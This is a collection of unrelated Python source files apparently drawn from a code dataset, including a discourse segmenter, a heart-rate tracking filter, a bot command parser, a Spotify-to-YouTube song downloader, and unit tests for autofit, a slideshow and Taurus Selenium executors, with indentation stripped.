:param tokens_by_abs_id: dictionary of absolute sent+word IDs to the corresponding token property dictionary
:param dummies: Boolean, whether to wrap data with dummy -2, -1 ... +1 +2 tokens for training (should be False when predicting)
:return: n_grammified token list without feature names, and list of header names
"""
n_grammed = []
# Remove unneeded features
del_props = ["descendants","lemma","docname","head"]
for tok in data:
for prop in del_props:
tok.pop(prop)
base_headers = sorted(data[0].keys())
headers = copy.deepcopy(base_headers)
# Create fake root token to represent parent of root tokens
root_type = copy.deepcopy(data[0])
root_type.update({"word":"_","deprel":"_","first":"_","last":"_","genre":"_","closest_left":"_",
"closest_right":"_","farthest_left":"_","farthest_right":"_","pos":"_","cpos":"_","morph":"_"})
# Also use this token to introduce "_" as possible feature value for OOV cases
oov_type = copy.deepcopy(root_type)
oov_type["abs_id"] = "OOV"
oov_type["abs_parent"] = "OOV"
tokens_by_abs_id["OOV"] = oov_type
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
headers += [pref + "_" + h for h in base_headers]
# During training, pseudo-wrap extra tokens to enable 5 skip grams
wrapped = []
wrapped.append(copy.deepcopy(data[-2]))
wrapped.append(copy.deepcopy(data[-1]))
if dummies:
wrapped.append(oov_type)
wrapped += data
if dummies:
wrapped.append(oov_type)
wrapped.append(copy.deepcopy(data[0]))
wrapped.append(copy.deepcopy(data[1]))
data = wrapped
for i in range(2,len(data)-2):
tok = data[i]
prev_prev = data[i-2]
prev = data[i-1]
next = data[i+1]
next_next = data[i+2]
if tok["abs_parent"] in tokens_by_abs_id:
par = tokens_by_abs_id[tok["abs_parent"]]
else:
par = root_type
if par["abs_parent"] in tokens_by_abs_id:
par_par = tokens_by_abs_id[par["abs_parent"]]
else:
par_par = root_type
prev_prev_props = [prev_prev[k] for k in sorted(prev_prev.keys())]
prev_props = [prev[k] for k in sorted(prev.keys())]
tok_props = [tok[k] for k in sorted(tok.keys())]
par_props = [par[k] for k in sorted(par.keys())]
par_par_props = [par_par[k] for k in sorted(par_par.keys())]
next_props = [next[k] for k in sorted(next.keys())]
next_next_props = [next_next[k] for k in sorted(next_next.keys())]
n_grammed.append(tok_props + prev_prev_props + prev_props + par_props + par_par_props + next_props + next_next_props)
return n_grammed, headers
@staticmethod
def multicol_fit_transform(dframe, columns):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns and saves the mapping
:param dframe: pandas dataframe
:param columns: list of column names with categorical values to be pseudo-ordinalized
:return: the transformed dataframe and the saved mappings as a dictionary of encoders and labels
"""
if isinstance(columns, list):
columns = np.array(columns)
else:
columns = columns
encoder_dict = {}
# columns are provided, iterate through and get `classes_` ndarray to hold LabelEncoder().classes_
# for each column; should match the shape of specified `columns`
all_classes_ = np.ndarray(shape=columns.shape, dtype=object)
all_encoders_ = np.ndarray(shape=columns.shape, dtype=object)
all_labels_ = np.ndarray(shape=columns.shape, dtype=object)
for idx, column in enumerate(columns):
# instantiate LabelEncoder
le = LabelEncoder()
# fit and transform labels in the column
dframe.loc[:, column] = le.fit_transform(dframe.loc[:, column].values)
encoder_dict[column] = le
# append the `classes_` to our ndarray container
all_classes_[idx] = (column, np.array(le.classes_.tolist(), dtype=object))
all_encoders_[idx] = le
all_labels_[idx] = le
multicol_dict = {"encoder_dict":encoder_dict, "all_classes_":all_classes_,"all_encoders_":all_encoders_,"columns": columns}
return dframe, multicol_dict
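# Toy sketch of the fit/transform pair (feature values are made up):
#
#     # df = pd.DataFrame({"pos": ["NOUN", "VERB", "NOUN"], "tok_len": [3, 5, 4]})
#     # df_enc, mapping = SubtreeSegmenter.multicol_fit_transform(df, pd.Index(["pos"]))
#     # # "pos" is now numeric; at prediction time the same mapping is reused via
#     # # SubtreeSegmenter.multicol_transform(new_df, mapping["columns"], mapping["all_encoders_"])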
@staticmethod
def multicol_transform(dframe, columns, all_encoders_):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns based on existing mapping
:param dframe: a pandas dataframe
:param columns: list of column names to be transformed
:param all_encoders_: same length list of sklearn encoders, each mapping categorical feature values to numbers
:return: transformed numerical dataframe
"""
for idx, column in enumerate(columns):
dframe.loc[:, column] = all_encoders_[idx].transform(dframe.loc[:, column].values)
return dframe
if __name__ == "__main__":
p = ArgumentParser()
p.add_argument("-c","--corpus",default="spa.rst.sctb",help="corpus to use or 'all'")
p.add_argument("-d","--data_dir",default=os.path.normpath("../../../data"),help="Path to shared task data folder")
p.add_argument("-s","--sample_size",type=int,default=5000,help="Sample size to use for feature selection")
p.add_argument("-t","--tune_mode",default=None,choices=[None,"paramwise","full","hyperopt","features","permutation"])
p.add_argument("-r","--rare_thresh",type=int,default=200,help="Threshold rank for replacing words with POS tags")
p.add_argument("-m","--multitrain",action="store_true",help="Perform multitraining and save predictions for ensemble training")
p.add_argument("-b","--best_params",action="store_true",help="Load best parameters from file")
p.add_argument("--mode",action="store",default="test",choices=["train","train-test","optimize-train-test","test"])
p.add_argument("--eval_test",action="store_true",help="Evaluate on test, not dev")
p.add_argument("--auto",action="store_true",help="Evaluate on automatic parse")
opts = p.parse_args()
data_dir = opts.data_dir
rare_thresh = opts.rare_thresh
tune_mode = opts.tune_mode
if opts.auto:
data_dir = data_dir + "_parsed"
sys.stderr.write("o Evaluating on automatically parsed data\n")
corpora = os.listdir(data_dir)
if opts.corpus == "all":
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c))]
else:
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c)) and c == opts.corpus]
for corpus in corpora:
if "pdtb" in corpus:
continue
sys.stderr.write("o Corpus: " + corpus + "\n")
train = os.path.join(data_dir,corpus, corpus + "_train.conll")
dev = os.path.join(data_dir, corpus, corpus + "_dev.conll")
test = os.path.join(data_dir, corpus, corpus + "_test.conll")
if "." in corpus:
lang = corpus.split(".")[0]
else:
lang = "eng"
auto = "" if not opts.auto else "_auto"
seg = SubtreeSegmenter(lang=lang,model=corpus,auto=auto)
seg.corpus_dir = data_dir + os.sep + corpus
# Special genre patterns and feature settings
if "gum" in corpus:
seg.genre_pat = "GUM_(.+)_.*"
best_params = None
if "optimize" in opts.mode:
best_clf, vars, best_params = seg.optimize(train,size=opts.sample_size,tune_mode=tune_mode,rare_thresh=rare_thresh,as_text=False, cached_params=opts.best_params)
# Now train on whole training set with those variables
if "best_score" in best_params:
best_params.pop("best_score")
sys.stderr.write("\no Training best configuration\n")
seg.train(train,chosen_feats=vars,rare_thresh=rare_thresh,clf_params=best_params,as_text=False,chosen_clf=best_clf)
elif "train" in opts.mode:
feats = None
params = None
best_clf = None
if opts.best_params:
best_clf, params, feats = get_best_params(corpus, "SubtreeSegmenter" + auto)
if len(feats) == 0:
feats = None
seg.train(train,rare_thresh=rare_thresh,as_text=False,multitrain=opts.multitrain,chosen_feats=feats,clf_params=params,chosen_clf=best_clf)
if "test" in opts.mode:
if opts.multitrain:
# Get prediction performance on out-of-fold
preds = seg.predict_cached()
else:
# Get prediction performance on dev
if opts.eval_test:
conf_mat, prec, rec, f1 = seg.predict(test,eval_gold=True,as_text=False)
else:
conf_mat, prec, rec, f1 = seg.predict(dev,eval_gold=True,as_text=False)
if best_params is not None and "optimize" in opts.mode: # For optimization check if this is a new best score
prev_best_score = get_best_score(corpus,"SubtreeSegmenter" + auto)
if f1 > prev_best_score:
sys.stderr.write("o New best F1: " + str(f1) + "\n")
print(seg.clf.__dict__)
with io.open(script_dir + os.sep + "params" + os.sep + "SubtreeSegmenter"+auto+"_best_params.tab",'a',encoding="utf8") as bp:
for k, v in best_params.items():
bp.write("\t".join([corpus, best_clf.__class__.__name__, k, str(v)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "features", ",".join(vars)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "best_score", str(f1)])+"\n\n")
|
the-stack_0_1651 | #!/usr/bin/env python
from mapHrEstimator import *
#
# Global function
#
class Tracker:
def __init__(self, start, alpha=.01, beta=0, deltaFreqState=0.0, time=-1000,
maxChange=.5, boundHi=205, boundLo=40, maxDeltaT=3000):
self.freqState = float(start)  # np.float was removed from recent NumPy; the builtin float is equivalent
self.deltaFreqState = deltaFreqState
self.time = time
self.boundHi = boundHi
self.boundLo = boundLo
self.peakHist = []
self.freq = []
self.deltaFreq = []
self.timeHist = []
self.drHist = []
self.alpha = alpha
self.beta = beta
self.maxChange = maxChange
self.maxDeltaT = maxDeltaT
def update(self, time, peak, dynamicRange=None, maxRes=20, invalidHRHold=False):
deltaT = (time - self.time)
if deltaT > self.maxDeltaT:
deltaT = self.maxDeltaT
#Convert into seconds
deltaT = deltaT/1000
#todo - why do we need this???
if deltaT <= 0.0:
print("Negative DeltaT")
return 0
self.time = time
self.timeHist.append(self.time)
self.drHist.append(dynamicRange)
if peak == -1:
self.setInvalidHR(invalidHRHold=invalidHRHold)
return 0
if peak is None:
print("No Peak Passed to tracker")
self.peakHist.append(0)
else:
self.peakHist.append(peak)
if peak is not None:
if peak < self.boundLo or peak > self.boundHi:
peak = self.freqState
self.deltaFreqState = 0
else:
self.deltaFreqState = 0
if self.deltaFreqState > .5:
self.deltaFreqState = .5
if self.deltaFreqState < -.5:
self.deltaFreqState = -.5
# Kludge: Setting deltaFreqState to zero thus eliminated the beta part of the filter
self.deltaFreqState = 0
self.freqState += deltaT*self.deltaFreqState
if peak is not None:
residual = peak - self.freqState
self.residual.append(residual)  # keep residual history for later inspection/plotting
alpha = self.alpha
beta = self.beta
if np.abs(residual) > maxRes:
residual = np.sign(residual)*maxRes
#update the state
self.freqState += alpha*residual
self.deltaFreqState += (beta/deltaT)*residual
if self.freqState < self.boundLo:
self.freqState = self.boundLo
self.deltaFreqState = 0
elif self.freqState > self.boundHi:
self.freqState = self.boundHi
self.deltaFreqState = 0
self.freq.append(self.freqState)
self.deltaFreq.append(self.deltaFreqState)
return 0
def setInvalidHR(self, invalidHRHold=False):
self.deltaFreqState = 0
self.peakHist.append(0)
if invalidHRHold:
self.freq.append(self.freqState) # hold prevHR during HR is invalid
else:
self.freq.append(-1) # do not hold prevHR, output -1
self.deltaFreq.append(self.deltaFreqState)
return 0
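# Hedged sketch of a tracker update loop (synthetic, constant 72 BPM peaks at 1 s steps):
#
#     # trk = Tracker(70)
#     # for t_ms in range(0, 10000, 1000):
#     #     trk.update(t_ms, 72)
#     # # trk.freq now holds estimates drifting slowly from 70 toward 72 (alpha = .01)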
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('fname', help='data log file', default=None)
parser.add_argument('--truthFile', help='heart strap data', default=None)
parser.add_argument('--alphaFile', help='heart strap data from mio alpha', default=None)
parser.add_argument('--noPlots',help='show the plots or not',default=False,action='store_true')
parser.add_argument('--out', help='output filename', default='foo.csv')
args = parser.parse_args()
optTracks = []
accTracks = []
#header_def = [ ('time',float),('opt0',float),('opt1',float),('opt2',float),('acc0',float),('acc1',float),('acc2',float) ]
d = np.genfromtxt(args.fname,delimiter=',')
peaks = d[:,1:4]
accPeaks = d[:,4:7]
time = d[:,0]
startVals = [70]
for ind in np.arange(0,len(startVals)):
optTracks.append(Tracker(startVals[ind],maxChange=5))
startVals = [100]
for ind in np.arange(0,len(startVals)):
accTracks.append(Tracker(startVals[ind],alpha=.1,beta=.25))
for ind in np.arange(0,peaks.shape[0]):
for peakInd in np.arange(0,peaks.shape[1]):
for accInd in np.arange(0,accPeaks.shape[1]):
if (np.abs(peaks[ind,0] - peaks[ind,1]) < 20):
if np.abs(peaks[ind,peakInd]-accPeaks[ind,accInd]) < 5.0:
peaks[ind,peakInd] = np.min(peaks[ind,:])
#update the accelerometer tracks
#for each track find the closest peak
for track in np.arange(0,len(accTracks)):
accTracks[track].update(time[ind],accPeaks[ind,track])
'''
#for each track find the closest peak
for track in accTracks:
res = np.zeros((accPeaks.shape[1],))
for peakInd in np.arange(0,accPeaks.shape[1]):
res[peakInd] = np.abs(accPeaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],accPeaks[ind,closest])
'''
#for each track find the closest peak
for track in optTracks:
res = np.zeros((peaks.shape[1],))
weight=np.array([1.0,1.0,1.0])
for peakInd in np.arange(0,peaks.shape[1]):
if peaks[ind,peakInd] > 90:
res[peakInd] = weight[peakInd]*np.abs(peaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],peaks[ind,closest])
pl.figure()
for ind in np.arange(0,peaks.shape[1]):
pl.plot(time[:],peaks[:,ind],'+')
pl.grid(True)
#pl.figure()
#todo - interpolate truth heart rate onto measured heart rate
if args.truthFile is not None:
hrTruth = np.genfromtxt(args.truthFile,skiprows=3,delimiter=',');
tTrue=hrTruth[:,0]-hrTruth[1,0]
tTrue /= 1000
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
for ind in np.arange(0,accPeaks.shape[1]):
pl.plot(time[:],accPeaks[:,ind],'+')
for track in accTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
if args.truthFile is not None:
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
pl.plot(optTracks[0].residual)
pl.show()
|
the-stack_0_1654 | from __future__ import annotations
import inspect
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from .command import Command
from .converters import _CONVERTERS
if TYPE_CHECKING:
from .context import Context
__all__ = ("StringParser",)
class StringParser:
"""
A class representing a StringParser.
Attributes:
command_name (Optional[str]): The name of the command.
command (Optional[Command]): The [Command](./command.md) object.
arguments (List[str]): The arguments of the command.
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
def __init__(self, content: str, prefix: Union[str, Tuple[str, ...], List[str]]) -> None:
"""
Initialize a StringParser.
Parameters:
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
self.command_name: Optional[str] = None
self.command: Optional[Command] = None
self.arguments: List[str] = []
self.content = content
self.prefix = prefix
self.context: Context
def find_command(self) -> Optional[str]:
"""
Find the command.
Returns:
The command name.
"""
tokens = self.content.split(" ")
if prefix := self.parse_prefix():
if tokens[0].startswith(prefix):
self.command_name = tokens[0][len(prefix) :]
self.arguments = tokens[1:]
return self.command_name
return None
def parse_prefix(self) -> Optional[str]:
"""
Parse the prefix.
Returns:
The prefix.
"""
if isinstance(self.prefix, (tuple, list)):
find_prefix = [self.content.startswith(prefix) for prefix in self.prefix]
for index, prefix in enumerate(find_prefix):
if prefix is not True:
continue
return self.prefix[index]
elif not isinstance(self.prefix, (tuple, list)):
return self.prefix
return None
async def parse_arguments(self) -> Tuple[Dict, List]:
"""
Parse the arguments.
Returns:
The arguments and the keyword-arguments.
"""
keyword_arguments: Dict = {}
arguments: List = []
if self.command is not None:
signature = inspect.signature(self.command.callback)
for index, (argument, parameter) in enumerate(signature.parameters.items()):
if index == 0:
continue
if index == 1 and self.command.parent is not None:
continue
if parameter.kind is parameter.POSITIONAL_OR_KEYWORD:
arguments.append(await self.convert(parameter, self.arguments[index - 1]))
elif parameter.kind is parameter.KEYWORD_ONLY:
keyword_arguments[argument] = await self.convert(parameter, " ".join(self.arguments[index - 1 :]))
return keyword_arguments, arguments
async def convert(self, parameter: inspect.Parameter, data: str) -> Any:
name = parameter.annotation.removeprefix("lefi.")
if converter := _CONVERTERS.get(name):
return await converter.convert(self.context, data)
if parameter.annotation is not parameter.empty and callable(parameter.annotation):
return parameter.annotation(data)
return str(data)
@property
def invoker(self) -> Optional[Command]:
"""
Get the invoker.
Returns:
The invoker [Command](./command.md).
"""
return self.command
@property
def invoked_with(self) -> Optional[str]:
"""
The prefix the command was invoked with.
Returns:
The prefix.
"""
return self.parse_prefix()
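# Hedged usage sketch covering only the synchronous helpers (parse_arguments/convert
# additionally need a Context and a resolved Command):
#
#     # parser = StringParser("!ping hello there", prefix="!")
#     # parser.find_command()   # -> "ping", with parser.arguments == ["hello", "there"]
#     # parser.invoked_with     # -> "!"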
|
the-stack_0_1659 | import os
import pickle
from pathlib import Path
import pytest
import autofit as af
from autoconf.conf import output_path_for_test
from autofit.non_linear.paths.null import NullPaths
def test_null_paths():
search = af.DynestyStatic()
assert isinstance(
search.paths,
NullPaths
)
class TestPathDecorator:
@staticmethod
def assert_paths_as_expected(paths):
assert paths.name == "name"
assert paths.path_prefix == ""
def test_with_arguments(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_positional(self):
search = af.MockSearch("name")
paths = search.paths
assert paths.name == "name"
def test_paths_argument(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_combination_argument(self):
search = af.MockSearch("other", )
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
output_path = Path(
__file__
).parent / "path"
@pytest.fixture(
name="model"
)
def make_model():
return af.Model(
af.Gaussian
)
@output_path_for_test(
output_path
)
def test_identifier_file(model):
paths = af.DirectoryPaths()
paths.model = model
paths.search = af.DynestyStatic()
paths.save_all({}, {}, [])
assert os.path.exists(
output_path / paths.identifier / ".identifier"
)
def test_serialize(model):
paths = af.DirectoryPaths()
paths.model = model
pickled_paths = pickle.loads(
pickle.dumps(
paths
)
)
assert pickled_paths.model is not None
|
the-stack_0_1660 | import game
import pygame
from config import Config
class Main:
def __init__(self):
self.game_clock = pygame.time.Clock()
self.game = game.Game()
def mainloop(self):
while Config.BOOLEAN['game_loop']:
self.game.change_screen()
self.game_clock.tick(Config.CONSTANT['CLOCK'])
main = Main()
if __name__ == '__main__':
main.mainloop()
|
the-stack_0_1662 | from __future__ import unicode_literals
import re
import os
import spotipy.util as util
import youtube_dl
from spotify_dl.scaffold import *
def authenticate():
"""Authenticates you to Spotify
"""
scope = 'user-library-read'
username = ''
return util.prompt_for_user_token(username, scope)
def fetch_tracks(sp, playlist, user_id):
"""Fetches tracks from Spotify user's saved
tracks or from playlist(if playlist parameter is passed
and saves song name and artist name to songs list
"""
log.debug('Fetching saved tracks')
offset = 0
songs_dict = {}
if user_id is None:
current_user_id = sp.current_user()['id']
else:
current_user_id = user_id
while True:
if playlist is None:
results = sp.current_user_saved_tracks(limit=50, offset=offset)
else:
results = sp.user_playlist_tracks(current_user_id, playlist, None,
limit=50, offset=offset)
log.debug('Got result json %s', results)
for item in results['items']:
track = item['track']
if track is not None:
track_name = str(track['name'])
track_artist = str(track['artists'][0]['name'])
log.debug('Appending %s to'
'songs list', (track['name'] + ' - ' + track['artists'][0]['name']))
songs_dict.update({track_name: track_artist})
else:
log.warning("Track/artist name for %s not found, skipping", track)
offset += 1
if results.get('next') is None:
log.info('All pages fetched, time to leave.'
' Added %s songs in total', offset)
break
return songs_dict
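# Shape of the dict returned above (titles and artists are placeholders):
#
#     # {"Song Title A": "Artist A", "Song Title B": "Artist B"}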
def save_songs_to_file(songs, directory):
"""
:param songs: dict of song names to artist names, as returned by fetch_tracks
:param directory: directory where songs.txt is written
Saves the songs fetched by the fetch_tracks function to a songs.txt file
so they can later be downloaded with youtube-dl
"""
with open(os.path.join(directory, 'songs.txt'), 'w', encoding="utf-8") as f:
f.write(str(songs))
f.close()
def download_songs(info, download_directory, format_string, skip_mp3):
"""
Downloads songs from the YouTube URL passed to either
current directory or download_directory, is it is passed
"""
for item in info:
log.debug('Songs to download: %s', item)
url_, track_, artist_ = item
download_archive = download_directory + 'downloaded_songs.txt'
outtmpl = download_directory + '%(title)s.%(ext)s'
ydl_opts = {
'format': format_string,
'download_archive': download_archive,
'outtmpl': outtmpl,
'noplaylist': True,
'postprocessor_args': ['-metadata', 'title=' + str(track_),
'-metadata', 'artist=' + str(artist_)],
}
if not skip_mp3:
mp3_postprocess_opts = {
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}
ydl_opts['postprocessors'] = [mp3_postprocess_opts.copy()]
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
try:
log.debug(ydl.download([url_]))
except Exception as e:
log.debug(e)
print('Failed to download: {}'.format(url_))
continue
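# Illustrative `info` payload for download_songs (URL, titles and paths are placeholders;
# the format string is a standard youtube-dl selector):
#
#     # info = [("https://www.youtube.com/watch?v=xxxxxxxxxxx", "Some Track", "Some Artist")]
#     # download_songs(info, download_directory="./", format_string="bestaudio/best", skip_mp3=False)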
def extract_user_and_playlist_from_uri(uri, sp):
    playlist_re = re.compile(r"(spotify)(:user:[\w,.]+)?(:playlist:[\w]+)")
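    # Illustrative URI forms this pattern is intended to match (IDs below are hypothetical):
    #   spotify:user:someuser:playlist:37i9dQZF1DXcBWIGoYBM5M
    #   spotify:playlist:37i9dQZF1DXcBWIGoYBM5M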
user_id = sp.current_user()['id']
for playlist_uri in ["".join(x) for x in playlist_re.findall(uri)]:
segments = playlist_uri.split(":")
        if len(segments) >= 5:
user_id = segments[2]
playlist_id = segments[4]
log.info('List ID: ' + str(playlist_id))
else:
playlist_id = segments[2]
log.info('List ID: ' + str(playlist_id))
log.info('List owner: ' + str(user_id))
return user_id, playlist_id
def playlist_name(uri, sp):
user_id, playlist_id = extract_user_and_playlist_from_uri(uri, sp)
return get_playlist_name_from_id(playlist_id, user_id, sp)
def get_playlist_name_from_id(playlist_id, user_id, sp):
playlist = sp.user_playlist(user_id, playlist_id,
fields="tracks, next, name")
name = playlist['name']
return name
|
the-stack_0_1663 | from slideshow import SlideShow
def test_init_title(mocker):
"""Test init function sets title value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("ZlNLpWJUv52wgu2Y", stub)
slideshow.root.title.assert_called_once_with("ZlNLpWJUv52wgu2Y")
def test_init_callback(mocker):
"""Test init function sets callback"""
stub = mocker.stub()
slideshow = SlideShow("", stub)
assert slideshow.start_callback == stub
def test_init_geometry(mocker):
"""Test init function sets geometry values"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub, 500, 600)
slideshow.root.geometry.assert_called_once_with("500x600+0+0")
def test_show(mocker):
"""Test show function calls Tk.mainloop()"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.show()
slideshow.root.mainloop.assert_called_once_with()
def test_toggle_start_active(mocker):
"""Test toggle_start sets active value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
assert slideshow.is_active() is False
slideshow.toggle_start()
assert slideshow.is_active() is True
def test_toggle_start_callback(mocker):
"""Test toggle_start calls the callback function"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
stub.assert_called_once_with()
def test_toggle_start_buttontext(mocker):
"""Test toggle_start changes the button text"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Button")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_once_with(text="Stop")
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_with(text="Start")
def test_update_progress(mocker):
"""Test update_progress sets expected value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Label")
slideshow = SlideShow("", stub)
slideshow.update_progress(500, 600, "gx8oN6ZDHc3lv3xy")
slideshow.progress_label.config.assert_called_once_with(text="500 (83.33%): gx8oN6ZDHc3lv3xy")
|
the-stack_0_1664 | import os
import re
import shutil
import yaml
from io import BytesIO
import bzt
from bzt import ToolError, TaurusConfigError
from bzt.engine import EXEC
from bzt.modules._apiritif import ApiritifNoseExecutor
from bzt.modules.functional import LoadSamplesReader, FuncSamplesReader
from bzt.modules.provisioning import Local
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import LDJSONReader, FileReader
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER, EngineEmul
from tests.unit.mocks import DummyListener
from tests.unit.modules._selenium import SeleniumTestCase, MockPythonTool
class LDJSONReaderEmul(object):
def __init__(self):
self.data = []
def read(self, last_pass=False):
for line in self.data:
yield line
class TestSeleniumExecutor(SeleniumTestCase):
# todo: get_error_diagnostics: only geckodriver, not chrome-?
def setUp(self):
super(TestSeleniumExecutor, self).setUp()
self.CMD_LINE = ''
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = " ".join(args)
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def test_data_source_in_action(self):
self.configure({
EXEC: {
"executor": "selenium",
"iterations": 1,
"scenario": {
"data-sources": [RESOURCES_DIR + "selenium/data-sources/data.csv"],
"requests": [{
"label": "exec_it",
"assert": ["Simple Travel Agency"],
"actions": ["go(${host}/${page})"]}]}}})
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
def test_user_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 100,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 100", self.CMD_LINE)
def test_load_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj.engine.start_subprocess = self.start_subprocess
self.obj_prepare()
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_load_no_iter_duration(self):
self.configure({
EXEC: {
"executor": "apiritif",
"hold-for": "2s",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn("--iterations", self.CMD_LINE)
def test_func_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_func_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
class TestSeleniumStuff(SeleniumTestCase):
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = args
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def obj_prepare_runner(self):
super(SeleniumExecutor, self.obj).prepare()
self.obj.install_required_tools()
for driver in self.obj.webdrivers:
self.obj.env.add_path({"PATH": driver.get_dir()})
self.obj.create_runner()
self.obj.runner._check_tools = lambda *args: None
self.obj.runner._compile_scripts = lambda: None
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.runner.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
self.obj.script = self.obj.runner.script
def test_empty_scenario(self):
"""
Raise runtime error when no scenario provided
:return:
"""
self.configure({EXEC: {"executor": "selenium"}})
self.assertRaises(TaurusConfigError, self.obj_prepare)
def test_various_raise(self):
self.configure({ # RuntimeError when
EXEC: [{ # compilation fails
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/invalid.java"}
}, { # no files of known types were found.
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/not_found"}
}]})
self.assertRaises(ToolError, self.obj_prepare)
def test_empty_test_methods(self):
self.configure({ # Test exact number of tests when
EXEC: [{ # java annotations used
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SeleniumTest.java"}
}, { # test class extends JUnit TestCase
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SimpleTest.java"}
}, { # annotations used and no "test" in class name
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/selenium1.java"}
}]})
self.obj_prepare_runner()
def test_from_extension(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_from_extension.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_requests(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.get_widget()
